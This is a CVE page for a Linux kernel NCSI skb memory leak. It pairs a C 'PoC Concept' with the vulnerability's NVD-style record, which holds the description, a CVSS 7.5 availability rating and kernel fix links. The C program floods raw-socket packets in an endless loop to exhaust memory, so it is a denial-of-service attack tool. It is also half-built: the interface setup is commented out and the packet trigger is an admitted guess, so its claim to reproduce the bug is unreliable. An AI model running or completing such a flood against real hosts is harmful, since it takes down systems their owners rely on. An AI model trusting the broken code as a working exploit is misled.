CVE-2026-43373

/* * PoC Concept for CVE-2026-43373 * This PoC demonstrates sending malformed NCSI packets to trigger the skb leak. * Requires a system with NCSI enabled and raw socket capabilities. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <arpa/inet.h> #include <sys/socket.h> #include <linux/if_packet.h> #define NCSI_CMD 0x00 // Example command type int main() { int sockfd; struct sockaddr_ll sa; char buffer[64]; // Create raw socket sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (sockfd < 0) { perror("Socket creation failed"); return 1; } memset(&sa, 0, sizeof(sa)); // Fill in interface index (requires configuration) // sa.sll_ifindex = if_nametoindex("eth0"); memset(buffer, 0, sizeof(buffer)); // Construct a minimal malformed NCSI header // Assuming specific header fields that trigger the early return in ncsi_rcv_rsp // e.g., invalid length or type buffer[0] = 0xFF; // Invalid channel ID or similar trigger printf("Sending malformed NCSI packets to trigger memory leak...\n"); while(1) { sendto(sockfd, buffer, sizeof(buffer), 0, (struct sockaddr*)&sa, sizeof(sa)); usleep(10000); // Flood with packets } close(sockfd); return 0; }

{"cve": {"id": "CVE-2026-43373", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:48.423", "lastModified": "2026-05-11T08:16:11.827", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ncsi: fix skb leak in error paths\n\nEarly return paths in NCSI RX and AEN handlers fail to release\nthe received skb, resulting in a memory leak.\n\nSpecifically, ncsi_aen_handler() returns on invalid AEN packets\nwithout consuming the skb. Similarly, ncsi_rcv_rsp() exits early\nwhen failing to resolve the NCSI device, response handler, or\nrequest, leaving the skb unfreed."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "references": [{"url": "https://git.kernel.org/stable/c/553366c271479c0d571dd1bb5d1bcde4747fb82e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/59962588197863d0d746879f193905c0c6b3df49", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/5c3398a54266541610c8d0a7082e654e9ff3e259", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/81d6aee32f8f7bbc175c05dbf61f4430bfb88c4a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/87138dde2d6937b12b967f28fe598a7d59000ae4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/9891d7f4f1ede473c54b49776ae07755083eef06", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/b70c4e5e711931cdd56e6e905737b72f1e649189", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/fef5aa6e3bcf3c8053307642663a63b7362d7552", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}